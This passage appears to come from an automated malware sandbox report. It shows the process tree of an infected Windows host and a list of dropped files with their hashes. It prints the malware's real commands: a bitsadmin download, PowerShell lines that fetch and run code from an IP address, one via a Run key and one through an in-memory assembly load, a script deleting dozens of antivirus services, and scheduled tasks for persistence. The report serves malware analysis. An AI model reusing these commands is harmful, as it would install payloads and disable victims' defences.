                                "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                3⤵
                                • Download via BitsAdmin
                                PID:5896
                            • C:\Users\Admin\Documents\YLyfLdtG4aeto7JDq0eATD13.exe
                              "C:\Users\Admin\Documents\YLyfLdtG4aeto7JDq0eATD13.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4520
                              • C:\Users\Admin\AppData\Roaming\4963167.exe
                                "C:\Users\Admin\AppData\Roaming\4963167.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1460
                              • C:\Users\Admin\AppData\Roaming\2066937.exe
                                "C:\Users\Admin\AppData\Roaming\2066937.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4696
                            • C:\Users\Admin\Documents\vwBuTIRxRb5SNSqZ3XF8NBD2.exe
                              "C:\Users\Admin\Documents\vwBuTIRxRb5SNSqZ3XF8NBD2.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:1792
                              • C:\Users\Admin\AppData\Local\Temp\is-NAB2O.tmp\vwBuTIRxRb5SNSqZ3XF8NBD2.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-NAB2O.tmp\vwBuTIRxRb5SNSqZ3XF8NBD2.tmp" /SL5="$3014A,138429,56832,C:\Users\Admin\Documents\vwBuTIRxRb5SNSqZ3XF8NBD2.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of FindShellTrayWindow
                                PID:4300
                          • C:\Windows\system32\backgroundTaskHost.exe
                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                            1⤵
                            • Executes dropped EXE
                            PID:2284
                          • \??\c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                            1⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            PID:4064
                          • C:\Users\Admin\AppData\Local\Temp\ED9D.exe
                            C:\Users\Admin\AppData\Local\Temp\ED9D.exe
                            1⤵
                              PID:4476
                            • C:\Users\Admin\AppData\Local\Temp\F1A5.exe
                              C:\Users\Admin\AppData\Local\Temp\F1A5.exe
                              1⤵
                              • Executes dropped EXE
                              PID:5696
                              • C:\ProgramData\Runtimebroker.exe
                                "C:\ProgramData\Runtimebroker.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:6000
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
                                  3⤵
                                    PID:5648
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
                                    3⤵
                                      PID:5228
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell" Get-MpPreference -verbose
                                        4⤵
                                          PID:1276
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            5⤵
                                            • Executes dropped EXE
                                            • Modifies registry class
                                            PID:4560
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
                                          4⤵
                                            PID:2872
                                    • C:\Users\Admin\AppData\Local\Temp\F30D.exe
                                      C:\Users\Admin\AppData\Local\Temp\F30D.exe
                                      1⤵
                                        PID:4560
                                        • C:\Windows\SysWOW64\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\reviewbrokercrtCommon\TrdyjLEi.vbe"
                                          2⤵
                                            PID:4672
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\reviewbrokercrtCommon\5odLAROhl.bat" "
                                              3⤵
                                                PID:5712
                                                • C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe
                                                  "C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • Drops file in System32 directory
                                                  PID:5140
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Xr8uZE8AZY.bat"
                                                    5⤵
                                                      PID:4412
                                                      • C:\Windows\system32\chcp.com
                                                        chcp 65001
                                                        6⤵
                                                          PID:5152
                                                        • C:\Windows\system32\w32tm.exe
                                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          6⤵
                                                            PID:1204
                                                          • C:\Users\Admin\Documents\cBtqBNqwXdb3zhTMvm1NJw2V\AfGceh7C3AiICU0VpXEapNYr.exe
                                                            "C:\Users\Admin\Documents\cBtqBNqwXdb3zhTMvm1NJw2V\AfGceh7C3AiICU0VpXEapNYr.exe"
                                                            6⤵
                                                              PID:5068
                                                  • C:\Users\Admin\AppData\Local\Temp\F476.exe
                                                    C:\Users\Admin\AppData\Local\Temp\F476.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:4728
                                                    • C:\Users\Admin\AppData\Local\Temp\F476.exe
                                                      C:\Users\Admin\AppData\Local\Temp\F476.exe
                                                      2⤵
                                                        PID:4340
                                                    • C:\Users\Admin\AppData\Local\Temp\F794.exe
                                                      C:\Users\Admin\AppData\Local\Temp\F794.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:4540
                                                    • C:\Users\Admin\AppData\Local\Temp\FA92.exe
                                                      C:\Users\Admin\AppData\Local\Temp\FA92.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:5632
                                                    • C:\Windows\SysWOW64\explorer.exe
                                                      C:\Windows\SysWOW64\explorer.exe
                                                      1⤵
                                                        PID:5668
                                                      • C:\Windows\explorer.exe
                                                        C:\Windows\explorer.exe
                                                        1⤵
                                                          PID:3208
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "bitsadmin" /sc ONLOGON /tr "'C:\Documents and Settings\bitsadmin.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Creates scheduled task(s)
                                                          PID:5088
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "AfGceh7C3AiICU0VpXEapNYr" /sc ONLOGON /tr "'C:\Users\Admin\Documents\cBtqBNqwXdb3zhTMvm1NJw2V\AfGceh7C3AiICU0VpXEapNYr.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Creates scheduled task(s)
                                                          PID:4788
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\spoolsv\dllhost.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Creates scheduled task(s)
                                                          PID:6044
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\C_20905\dwm.exe'" /rl HIGHEST /f
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Creates scheduled task(s)
                                                          PID:4640
                                                        • C:\Windows\SysWOW64\explorer.exe
                                                          C:\Windows\SysWOW64\explorer.exe
                                                          1⤵
                                                            PID:4956
                                                          • C:\Windows\explorer.exe
                                                            C:\Windows\explorer.exe
                                                            1⤵
                                                              PID:5884
                                                            • C:\Windows\SysWOW64\explorer.exe
                                                              C:\Windows\SysWOW64\explorer.exe
                                                              1⤵
                                                                PID:808
                                                              • C:\Windows\explorer.exe
                                                                C:\Windows\explorer.exe
                                                                1⤵
                                                                  PID:5144
                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                  1⤵
                                                                    PID:5388
                                                                  • C:\Windows\explorer.exe
                                                                    C:\Windows\explorer.exe
                                                                    1⤵
                                                                      PID:6060
                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                      1⤵
                                                                        PID:3208
                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        1⤵
                                                                          PID:4608

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v6

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                          MD5

                                                                          1daac0c9a48a79976539b0722f9c3d3b

                                                                          SHA1

                                                                          843218f70a6a7fd676121e447b5b74acb0d87100

                                                                          SHA256

                                                                          e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                          SHA512

                                                                          2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                          MD5

                                                                          1daac0c9a48a79976539b0722f9c3d3b

                                                                          SHA1

                                                                          843218f70a6a7fd676121e447b5b74acb0d87100

                                                                          SHA256

                                                                          e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                          SHA512

                                                                          2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                          MD5

                                                                          aed57d50123897b0012c35ef5dec4184

                                                                          SHA1

                                                                          568571b12ca44a585df589dc810bf53adf5e8050

                                                                          SHA256

                                                                          096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                          SHA512

                                                                          ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                          MD5

                                                                          aed57d50123897b0012c35ef5dec4184

                                                                          SHA1

                                                                          568571b12ca44a585df589dc810bf53adf5e8050

                                                                          SHA256

                                                                          096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                          SHA512

                                                                          ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                          MD5

                                                                          3c7117f96c0c2879798a78a32d5d34cc

                                                                          SHA1

                                                                          197c7dea513f8cbb7ebc17610f247d774c234213

                                                                          SHA256

                                                                          6e17c993f42fcc005867e0fd33f98cae32726571d18f6dd8b9b06cefb82de162

                                                                          SHA512

                                                                          b89573ac6cbbe132c0c4bac009904cba6d5fda9b4d4eebe2d9552f2451acdd8b7b8e8dce663b26f6541c9c124eb5b9f468efd23b35a28047b0cb942f3a90c122

                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                          MD5

                                                                          3c7117f96c0c2879798a78a32d5d34cc

                                                                          SHA1

                                                                          197c7dea513f8cbb7ebc17610f247d774c234213

                                                                          SHA256

                                                                          6e17c993f42fcc005867e0fd33f98cae32726571d18f6dd8b9b06cefb82de162

                                                                          SHA512

                                                                          b89573ac6cbbe132c0c4bac009904cba6d5fda9b4d4eebe2d9552f2451acdd8b7b8e8dce663b26f6541c9c124eb5b9f468efd23b35a28047b0cb942f3a90c122

                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe
                                                                          MD5

                                                                          50a833d4031bc5d73968bb09985c9af1

                                                                          SHA1

                                                                          0cadd71afeb846c01aa0bbe7534307a06fc924db

                                                                          SHA256

                                                                          db871a0f3c13504b0dd296a91bd03132a031ed12c8449c3f2cdde438a8615197

                                                                          SHA512

                                                                          a6b9d2b34c30bce4752b3fea27b7bd7a76104ce3b5f2c6ebaacb33682c05ae4f2eaeb061ddd6beb34d2633b20cce341f7a1a5ed9835d12b397cd0a686d413735

                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER31BF.tmp.WERInternalMetadata.xml
                                                                          MD5

                                                                          c10ec5203e7993778b85dc12d0d08d0a

                                                                          SHA1

                                                                          c1cb885f438772df8d8431cd79757a7142d4c47c

